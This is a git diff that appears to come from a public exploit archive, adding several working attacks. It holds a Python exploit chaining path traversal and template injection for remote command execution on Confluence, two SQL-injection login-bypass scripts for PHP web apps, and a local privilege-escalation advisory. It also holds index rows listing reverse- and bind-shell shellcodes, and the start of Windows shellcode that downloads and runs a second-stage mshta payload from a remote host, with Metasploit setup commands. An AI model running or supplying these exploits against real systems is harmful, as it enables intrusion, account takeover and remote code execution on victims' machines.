f"{space_folder_one}/{space_folder_two}/{space_folder_three}/"\ + f"{page_folder_one}/{page_folder_two}/{page_folder_three}/" \ + f"{file_folder}/{version}" + log.debug(f"generated payload location: {payload_location}") + + return payload_location + + def path_traversal(self, target_remote_path, decode_output=False): + """ + Uses vulnerability in _template parameter to achieve path traversal. + + Args: + target_remote_path (string): path on local file system of the target application + decode_output (bool): set to True if output of the file will be character codes separated by new lines, + used with RCE + """ + post_data = { + "contentId": str(random.randint(1, 10000)), + "macro": { + "body": "", + "name": "widget", + "params": { + "_template": f"file://{target_remote_path}", + "url": "https://www.youtube.com/watch?v=" + ''.join(random.choice( + string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) + } + } + } + + log.info("sending request towards vulnerable endpoint with payload in '_template' parameter") + response = requests.post( + self._target_url, + headers={ + "Content-Type": "application/json; charset=utf-8" + }, + json=post_data, + proxies=self._config.proxies, + verify=False, + allow_redirects=False + ) + + # check if response was proper... + if not response.status_code == 200: + log.debug(f"response code: {response.status_code}") + exit_log(log, "exploit failed") + + page_content = response.content + # response is HTML + soup = BeautifulSoup(page_content, features="html.parser") + + # if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve + # the requested path + error_element = soup.find_all("div", "widget-error") + if error_element: + log.warning("failed to retrieve target path on the system") + log.warning("target path does not exist or application does not have appropriate permissions to view it") + return "" + else: + # otherwise parse out the actual response (file content or directory listing) + output_element = soup.find_all("div", "wiki-content") + + if not output_element: + exit_log(log, "application did not return appropriate HTML element") + if not len(output_element) == 1: + log.warning("application unexpectedly returned multiple HTML elements, using the first one") + output_element = output_element[0] + + log.debug("extracting HTML element value and stripping the leading and trailing spaces") + # output = output_element.string.strip() + output = output_element.decode_contents().strip() + + if "The macro 'widget' is unknown. It may have been removed from the system." in output: + exit_log(log, "widget seems to be disabled on system, target most likely is not vulnerable") + + if not self._config.script_arguments.silent: + if decode_output: + parsed_output = "" + p = re.compile(r"^([0-9]+)") + for line in output.split("\n"): + r = p.match(line) + if r: + parsed_output += chr(int(r.group(1))) + print(parsed_output.strip()) + else: + print(output) + + return output + + def find_personal_space_key(self): + """ + Makes request that will return personal space key in the response. + """ + log.debug("checking if user has personal space") + response = requests.get( + self._root_url, + cookies=self._config.session_cookie, + proxies=self._config.proxies, + verify=False, + ) + page_content = response.text + if "Add personal space" in page_content: + log.info(f"user does not have personal space, creating it now...") + + response = requests.post( + self._create_personal_space_url, + headers={ + "Content-Type": "application/json" + }, + cookies=self._config.session_cookie, + proxies=self._config.proxies, + verify=False, + json={ + "spaceUserKey": "" + } + ) + + if not response.status_code == 200: + log.debug(f"response code: {response.status_code}") + exit_log(log, "failed to create personal space") + + log.debug(f"personal space created") + response_data = response.json() + self._space_key = response_data.get("key") + else: + log.info("sending request to find personal space key") + response = requests.get( + self._personal_space_key_url, + cookies=self._config.session_cookie, + proxies=self._config.proxies, + verify=False, + allow_redirects=False + ) + + # check if response was proper... + if not response.status_code == 200: + log.debug(f"response code: {response.status_code}") + exit_log(log, "failed to get personal space key") + + page_content = response.content + # response is HTML + soup = BeautifulSoup(page_content, features="html.parser") + + personal_space_link_element = soup.find("a", id="view-personal-space-link") + if not personal_space_link_element or not personal_space_link_element.has_attr("href"): + exit_log(log, "failed to find personal space link in the response, does the user have personal space?") + path = personal_space_link_element["href"] + p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) + r = p.match(path) + if r: + self._space_key = r.group(1) + else: + exit_log(log, "failed to find personal space key") + + log.debug(f"personal space key: {self._space_key}") + self._personal_space_id_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?" \ + f"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}" + log.debug(f"generated personal space id url: {self._personal_space_id_url}") + + def find_personal_space_id_and_homepage_id(self): + """ + Makes request that will return personal space ID and homepage ID in the response. + """ + if self._personal_space_id_url is None: + exit_log(log, f"personal space id url is missing, did you call exploit functions in correct order?") + + log.info("sending request to find personal space ID and homepage") + response = requests.get( + self._personal_space_id_url, + cookies=self._config.session_cookie, + proxies=self._config.proxies, + verify=False, + allow_redirects=False + ) + + # check if response was proper... + if not response.status_code == 200: + log.debug(f"response code: {response.status_code}") + exit_log(log, "failed to get personal space key") + + page_content = response.content + # response is JSON + data = json.loads(page_content) + + if "results" not in data: + exit_log(log, "failed to find 'result' section in json output") + items = data["results"] + if type(items) is not list or len(items) == 0: + exit_log(log, "no results for personal space id") + personal_space_data = items[0] + if "id" not in personal_space_data: + exit_log(log, "failed to find ID in personal space data") + self._space_id = str(personal_space_data["id"]) + log.debug(f"found space id: {self._space_id}") + if "_expandable" not in personal_space_data: + exit_log(log, "failed to find '_expandable' section in personal space data") + personal_space_expandable_data = personal_space_data["_expandable"] + if "homepage" not in personal_space_expandable_data: + exit_log(log, "failed to find homepage in personal space expandable data") + homepage_path = personal_space_expandable_data["homepage"] + p = re.compile(Exploit.HOMEPAGE_REGEX) + r = p.match(homepage_path) + if r: + self._homepage_id = r.group(1) + log.debug(f"found homepage id: {self._homepage_id}") + self._atl_token_url = f"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}" + log.debug(f"generated atl token url: {self._atl_token_url}") + self._upload_url = f"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}" + log.debug(f"generated upload url: {self._upload_url}") + else: + exit_log(log, "failed to find homepage id, homepage path has incorrect format") + + def get_csrf_token(self): + """ + Makes request to get the current CSRF token for the session. + """ + if self._atl_token_url is None: + exit_log(log, f"atl token url is missing, did you call exploit functions in correct order?") + + log.info("sending request to find CSRF token") + response = requests.get( + self._atl_token_url, + cookies=self._config.session_cookie, + proxies=self._config.proxies, + verify=False, + allow_redirects=False + ) + + # check if response was proper... + if not response.status_code == 200: + log.debug(f"response code: {response.status_code}") + exit_log(log, "failed to get personal space key") + + page_content = response.content + # response is HTML + soup = BeautifulSoup(page_content, features="html.parser") + + atl_token_element = soup.find("input", {"name": "atl_token"}) + if not atl_token_element.has_attr("value"): + exit_log(log, "failed to find value for atl_token") + self._atl_token = atl_token_element["value"] + log.debug(f"found CSRF token: {self._atl_token}") + + def upload_template(self): + """ + Makes multipart request to upload the template file to the server. + """ + log.info("uploading template to server") + if not self._atl_token: + exit_log(log, "cannot upload a file without CSRF token") + if self._upload_url is None: + exit_log(log, f"upload url is missing, did you call exploit functions in correct order?") + + # Velocity template here executes command and then captures the output. Here the output is generated by printing + # character codes one by one in each line. This can be improved for sure but did not have time to investigate + # why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern + # webapp' was not working properly. This gets decoded on our python client later. + template = f"""#set( $test = "test" ) +#set($ex = $test.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{self._config.script_arguments.command}")) +#set($exout = $ex.waitFor()) +#set($out = $ex.getInputStream()) +#foreach($i in [1..$out.available()]) +#set($ch = $out.read()) +$ch +#end""" + + log.debug(f"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}") + parts = { + "atl_token": (None, self._atl_token), + "file_0": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), + "confirm": "Attach" + } + response = requests.post( + self._upload_url, + cookies=self._config.session_cookie, + proxies=self._config.proxies, + verify=False, + files=parts + ) + + # for successful upload first a 302 response needs to happen then 200 page is returned with file ID + if response.status_code == 403: + exit_log(log, "got 403, probably problem with CSRF token") + if not len(response.history) == 1 or not response.history[0].status_code == 302: + exit_log(log, "failed to upload the payload") + + page_content = response.content + + if "Upload Failed" in str(page_content): + exit_log(log, "failed to upload template") + + # response is HTML + soup = BeautifulSoup(page_content, features="html.parser") + + file_link_element = soup.find("a", "filename", {"title": Exploit.DEFAULT_UPLOADED_FILE_NAME}) + if not file_link_element.has_attr("data-linked-resource-id"): + exit_log(log, "failed to find data-linked-resource-id attribute (file ID) for uploaded file link") + self._file_id = file_link_element["data-linked-resource-id"] + log.debug(f"found file ID: {self._file_id}") + + +def exploit_path_traversal(config): + """ + This sends one request towards vulnerable server to either get local file content or directory listing. + """ + log.debug("running path traversal exploit") + + exploit = Exploit(config) + exploit.path_traversal(config.remote_path) + + +def exploit_rce(config): + """This executes multiple steps to gain RCE. Requires a session token. + + Steps: + 1. find personal space key for the user + 2. find personal space ID and homepage ID for the user + 3. get CSRF token (generated per session) + 4. upload template file with Java code (involves two requests, first one is 302 redirection) + 5. use path traversal part of exploit to load and execute local template file + 6. profit + """ + log.debug("running RCE exploit") + + exploit = Exploit(config) + exploit.find_personal_space_key() + exploit.find_personal_space_id_and_homepage_id() + exploit.get_csrf_token() + exploit.upload_template() + payload_location = exploit.generate_payload_location() + exploit.path_traversal(payload_location, decode_output=True) + + +if __name__ == "__main__": + # parse arguments and load all configuration items + script_arguments = parse_arguments() + log = Configuration.get_logger(script_arguments.verbosity) + + configuration = Configuration(script_arguments) + + # printing banner + if not configuration.script_arguments.skip_banner: + print_banner() + + if script_arguments.quiet: + log.disabled = True + + log.debug("finished parsing CLI arguments") + log.debug("configuration was loaded successfully") + log.debug("starting exploit") + + # disabling warning about trusting self sign certificate from python requests + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + # run appropriate function depending on mode + configuration.script_arguments.func(configuration) + + log.debug("done!") \ No newline at end of file diff --git a/exploits/php/webapps/49462.py b/exploits/php/webapps/49462.py new file mode 100755 index 000000000..46b641849 --- /dev/null +++ b/exploits/php/webapps/49462.py @@ -0,0 +1,58 @@ +# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection +# Exploit Author: Himanshu Shukla +# Date: 2021-01-21 +# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip +# Version: 1.0 +# Tested On: Windows 10 + XAMPP 7.4.4 +# Description: Library System 1.0 - Authentication Bypass Via SQL Injection +#STEP 1 : Run The Exploit With This Command : python3 exploit.py +#STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/ +#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser. + +#Note - You Will Only Be Able To Access The Student Area as a Privileged User. + +import requests +YELLOW = '\033[33m' # Yellow Text +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults + +print(YELLOW+' _ ______ _ _ ___ ', RESET) +print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET) +print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET) +print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET) +print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET) +print(YELLOW+" ", RESET) +print('********************************************************') +print('** LIBRARY SYSTEM 1.0 **') +print('** AUTHENTICATION BYPASS USING SQL INJECTION **') +print('********************************************************') + +print('Author - Himanshu Shukla') + + +#Create a new session + +s = requests.Session() + +#Set Cookie +cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'} + +LINK=input("Enter URL of The Vulnarable Application : ") + +#Authentication Bypass +print("[*]Attempting Authentication Bypass...") +values = {"student":"'or 1 or'","login":""} +r=s.post(LINK+'login.php', data=values, cookies=cookies) + +r=s.post(LINK+'login.php', data=values, cookies=cookies) + +#Check if Authentication was bypassed or not. +logged_in = True if not("Student not found" in r.text) else False +l=logged_in +if l: + print(GREEN+"[+]Authentication Bypass Successful!", RESET) + print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET) +else: + print(RED+"[-]Failed To Authenticate!", RESET) \ No newline at end of file diff --git a/exploits/php/webapps/49463.py b/exploits/php/webapps/49463.py new file mode 100755 index 000000000..5cfc381bd --- /dev/null +++ b/exploits/php/webapps/49463.py @@ -0,0 +1,82 @@ +# Exploit Title: CASAP Automated Enrollment System 1.0 - Authentication Bypass +# Exploit Author: Himanshu Shukla +# Date: 2021-01-21 +# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip +# Version: 1.0 +# Tested On: Ubuntu + XAMPP 7.4.4 +# Description: CASAP Automated Enrollment System 1.0 - Authentication Bypass Using SQLi + + +#STEP 1 : Run The Exploit With This Command : python3 exploit.py +# For Example: python3 exploit.py http://10.9.67.23/final/ +#STEP 2 : Open the Link Provided At The End After Successful Authentication Bypass in Browser. + + +import time +import sys +import requests + + +YELLOW = '\033[33m' # Yellow Text +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults + +print(YELLOW+' _ ______ _ _ ___ ', RESET) +print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET) +print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET) +print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET) +print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET) +print(YELLOW+" ", RESET) +print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!') +print('!!! CASAP AUTOMATED ENROLLMENT SYSTEM 1.0 !!!') +print('!!! AUTHENTICATION BYPASS !!!') +print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!') + +print('Author - Himanshu Shukla') + + +def authbypass(url): + + #Authentication Bypass + s = requests.Session() + #Set Cookie + cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'} + + + print ("[*]Attempting Authentication Bypass...") + time.sleep(1) + + values = {"username":"'or 1 or'","password":""} + r=s.post(url+'login.php', data=values, cookies=cookies) + p=s.get(url+'dashboard.php', cookies=cookies) + + #Check if Authentication was bypassed or not. + logged_in = True if ("true_admin" in r.text) else False + l=logged_in + if l: + print(GREEN+"[+]Authentication Bypass Successful!", RESET) + print(YELLOW+"[+]Open This Link To Continue As Admin : "+url+"dashboard.php", RESET) + else: + print(RED+"[-]Failed To Authenticate!", RESET) + print(RED+"[-]Check Your URL", RESET) + + +if __name__ == "__main__": + + + if len(sys.argv)!=2: + print(RED+"You Haven't Provided any URL!", RESET) + print("Usage : python3 exploit.py ") + print("Example : python3 exploit.py http://10.9.7.3/final/") + exit() + + try: + + authbypass(sys.argv[1]) + + except: + + print(RED+"[-]Invalid URL!", RESET) + exit() \ No newline at end of file diff --git a/exploits/windows/local/49453.txt b/exploits/windows/local/49453.txt new file mode 100644 index 000000000..1f79c8dde --- /dev/null +++ b/exploits/windows/local/49453.txt @@ -0,0 +1,70 @@ +# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation +# Date: 08.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.selea.com + +Selea CarPlateServer (CPS) v4.0.1.6 Local Privilege Escalation + + +Vendor: Selea s.r.l. +Product web page: https://www.selea.com +Affected version: 4.0.1.6(210120) + 4.013(201105) + 3.100(200225) + 3.005(191206) + 3.005(191112) + +Summary: Our CPS (Car Plate Server) software is an advanced solution that can +be installed on computers and servers and used as an operations centre. It can +create sophisticated traffic control and road safety systems connecting to +stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert +notifications directly to tablets or smartphones, it can receive and transfer +data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution +that offers full integration with main video surveillance software. Our CPS +software connects to the national operations centre and provides law enforcement +authorities with necessary tools to issue alerts. CPS is designed to guarantee +cooperation among different law enforcement agencies. It allows to create a +multi-user environment that manages different hierarchy levels and the related +division of competences. + +Desc: The application suffers from an unquoted search path issue impacting the +service 'Selea CarPlateServer' for Windows deployed as part of Selea CPS software +application. This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. A successful +attempt would require the local user to be able to insert their code in the system +root path undetected by the OS or other security applications where it could +potentially be executed during application startup or reboot. If successful, the +local user's code would execute with the elevated privileges of the application. + +Tested on: Microsoft Windows 10 Enterprise + SeleaCPSHttpServer/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5621 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php + + +08.11.2020 + +-- + + +C:\Users\Smurf>sc qc "Selea CarPlateServer" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Selea CarPlateServer + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Selea CarPlateServer + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\Smurf> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 92458bfc2..3aadaee24 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11244,6 +11244,7 @@ id,file,description,date,author,type,platform,port 49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows, 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java, 49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows, +49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",2021-01-22,LiquidWorm,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -43649,3 +43650,16 @@ id,file,description,date,author,type,platform,port 49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",2021-01-21,"Matthew Aberegg",webapps,php, 49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",2021-01-21,"SunCSR Team",webapps,php, 49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple, +49452,exploits/multiple/webapps/49452.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution",2021-01-22,LiquidWorm,webapps,multiple, +49454,exploits/hardware/webapps/49454.txt,"Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS",2021-01-22,LiquidWorm,webapps,hardware, +49455,exploits/hardware/webapps/49455.txt,"Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite",2021-01-22,LiquidWorm,webapps,hardware, +49456,exploits/hardware/webapps/49456.txt,"Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware, +49457,exploits/hardware/webapps/49457.txt,"Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware, +49458,exploits/hardware/webapps/49458.html,"Selea Targa IP OCR-ANPR Camera - CSRF Add Admin",2021-01-22,LiquidWorm,webapps,hardware, +49459,exploits/hardware/webapps/49459.txt,"Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware, +49460,exploits/hardware/webapps/49460.sh,"Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware, +49461,exploits/java/webapps/49461.py,"Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)",2021-01-22,Photubias,webapps,java, +49462,exploits/php/webapps/49462.py,"Library System 1.0 - Authentication Bypass Via SQL Injection",2021-01-22,"Himanshu Shukla",webapps,php, +49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",2021-01-22,"Himanshu Shukla",webapps,php, +49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",2021-01-22,Hodorsec,webapps,multiple, +49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",2021-01-22,46o60,webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 91bbba5c5..3ca8863af 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1,7 +1,7 @@ id,file,description,date,author,type,platform 14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm -49442,shellcodes/linux/49442.c,"Linux/x64 - Reverse (127.1.1.1:4444) Shell (/bin/sh) Shellcode (123 Bytes)",2021-01-19,"Guillem Alminyana",shellcode,linux -49446,shellcodes/linux_x86/49446.c,"Linux/x86 - Socat Bind Shellcode (113 bytes)",2021-01-20,"Felipe Winsnes",shellcode,linux_x86 +49442,shellcodes/linux/49442.c,"Linux/x64 - Reverse (127.1.1.1:4444/TCP) Shell (/bin/sh) Shellcode (123 Bytes)",2021-01-19,"Guillem Alminyana",shellcode,linux +49446,shellcodes/linux_x86/49446.c,"Linux/x86 - Bind Socat (0.0.0.0:1000/TCP) Shell (Bash) Shellcode (113 bytes)",2021-01-20,"Felipe Winsnes",shellcode,linux_x86 13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix 13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc @@ -1025,6 +1025,7 @@ id,file,description,date,author,type,platform 48585,shellcodes/arm/48585.c,"Linux/ARM - execve(/bin/dash) Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86 -48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86 +48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86 49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux +49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86 diff --git a/shellcodes/windows_x86/49466.asm b/shellcodes/windows_x86/49466.asm new file mode 100644 index 000000000..cbc16cfba --- /dev/null +++ b/shellcodes/windows_x86/49466.asm @@ -0,0 +1,185 @@ +# Exploit Title: Windows/x86 - Stager Generic MSHTA Shellcode (143 bytes) +# Exploit Author: Armando Huesca Prida +# Date: 11-01-2021 +# Tested on: Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86) +# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86) +# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86) + +## Description: Windows x86 Shellcode that uses mshta.exe binary to execute a second stage payload delivered through metasploit's hta_server exploit. This shellcode uses JMP/CALL/POP technic and static kernel32.dll functions addresses. + +## Metasploit compatible payload list: + +# generic/custom +# generic/debug_trap +# generic/shell_bind_tcp +# generic/shell_reverse_tcp +# generic/tight_loop +# windows/dllinject/bind_hidden_ipknock_tcp +# windows/dllinject/bind_hidden_tcp +# windows/dllinject/bind_ipv6_tcp +# windows/dllinject/bind_ipv6_tcp_uuid +# windows/dllinject/bind_named_pipe +# windows/dllinject/bind_nonx_tcp +# windows/dllinject/bind_tcp +# windows/dllinject/bind_tcp_rc4 +# windows/dllinject/bind_tcp_uuid +# windows/dllinject/reverse_hop_http +# windows/dllinject/reverse_http +# windows/dllinject/reverse_http_proxy_pstore +# windows/dllinject/reverse_ipv6_tcp +# windows/dllinject/reverse_nonx_tcp +# windows/dllinject/reverse_ord_tcp +# windows/dllinject/reverse_tcp +# windows/dllinject/reverse_tcp_allports +# windows/dllinject/reverse_tcp_dns +# windows/dllinject/reverse_tcp_rc4 +# windows/dllinject/reverse_tcp_rc4_dns +# windows/dllinject/reverse_tcp_uuid +# windows/dllinject/reverse_winhttp +# windows/dns_txt_query_exec +# windows/download_exec +# windows/exec +# windows/loadlibrary +# windows/messagebox +# windows/meterpreter/bind_hidden_ipknock_tcp +# windows/meterpreter/bind_hidden_tcp +# windows/meterpreter/bind_ipv6_tcp +# windows/meterpreter/bind_ipv6_tcp_uuid +# windows/meterpreter/bind_named_pipe +# windows/meterpreter/bind_nonx_tcp +# windows/meterpreter/bind_tcp +# windows/meterpreter/bind_tcp_rc4 +# windows/meterpreter/bind_tcp_uuid +# windows/meterpreter/reverse_hop_http +# windows/meterpreter/reverse_http +# windows/meterpreter/reverse_http_proxy_pstore +# windows/meterpreter/reverse_https +# windows/meterpreter/reverse_https_proxy +# windows/meterpreter/reverse_ipv6_tcp +# windows/meterpreter/reverse_named_pipe +# windows/meterpreter/reverse_nonx_tcp +# windows/meterpreter/reverse_ord_tcp +# windows/meterpreter/reverse_tcp +# windows/meterpreter/reverse_tcp_allports +# windows/meterpreter/reverse_tcp_dns +# windows/meterpreter/reverse_tcp_rc4 +# windows/meterpreter/reverse_tcp_rc4_dns +# windows/meterpreter/reverse_tcp_uuid +# windows/meterpreter/reverse_winhttp +# windows/meterpreter/reverse_winhttps +# windows/metsvc_bind_tcp +# windows/metsvc_reverse_tcp +# windows/patchupdllinject/bind_hidden_ipknock_tcp +# windows/patchupdllinject/bind_hidden_tcp +# windows/patchupdllinject/bind_ipv6_tcp +# windows/patchupdllinject/bind_ipv6_tcp_uuid +# windows/patchupdllinject/bind_named_pipe +# windows/patchupdllinject/bind_nonx_tcp +# windows/patchupdllinject/bind_tcp +# windows/patchupdllinject/bind_tcp_rc4 +# windows/patchupdllinject/bind_tcp_uuid +# windows/patchupdllinject/reverse_ipv6_tcp +# windows/patchupdllinject/reverse_nonx_tcp +# windows/patchupdllinject/reverse_ord_tcp +# windows/patchupdllinject/reverse_tcp +# windows/patchupdllinject/reverse_tcp_allports +# windows/patchupdllinject/reverse_tcp_dns +# windows/patchupdllinject/reverse_tcp_rc4 +# windows/patchupdllinject/reverse_tcp_rc4_dns +# windows/patchupdllinject/reverse_tcp_uuid +# windows/patchupmeterpreter/bind_hidden_ipknock_tcp +# windows/patchupmeterpreter/bind_hidden_tcp +# windows/patchupmeterpreter/bind_ipv6_tcp +# windows/patchupmeterpreter/bind_ipv6_tcp_uuid +# windows/patchupmeterpreter/bind_named_pipe +# windows/patchupmeterpreter/bind_nonx_tcp +# windows/patchupmeterpreter/bind_tcp +# windows/patchupmeterpreter/bind_tcp_rc4 +# windows/patchupmeterpreter/bind_tcp_uuid +# windows/patchupmeterpreter/reverse_ipv6_tcp +# windows/patchupmeterpreter/reverse_nonx_tcp +# windows/patchupmeterpreter/reverse_ord_tcp +# windows/patchupmeterpreter/reverse_tcp +# windows/patchupmeterpreter/reverse_tcp_allports + + +# "hta_server" exploit payloads setting example: + +# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery) +# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list) +# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH) +# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary) +# msf6 exploit(windows/misc/hta_server) > run (second stage delivery server execution) + + +# Shellcode considerations: + +# Function address of CreateProcessA in kernel32.dll: 0x75732082 +# Function address of ExitProcess in kernel32.dll: 0x7578214f +# Size in bytes of message db parameter, 65 bytes -> 0x41 hex +# Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit + + +# Assembly Shellcode: + + + +global _start + +section .text + +_start: + jmp application + +firststep: + pop edi + xor eax, eax + mov [edi+65], al ; size in bytes of message db parameter + +StartUpInfoANDProcessInformation: + + push eax ; hStderror null in this case + push eax ; hStdOutput, null + push eax ; hStdInput, null + xor ebx, ebx + xor ecx, ecx + add cl, 0x12 ; 18 times loop to fill both structures. + +looper: + push 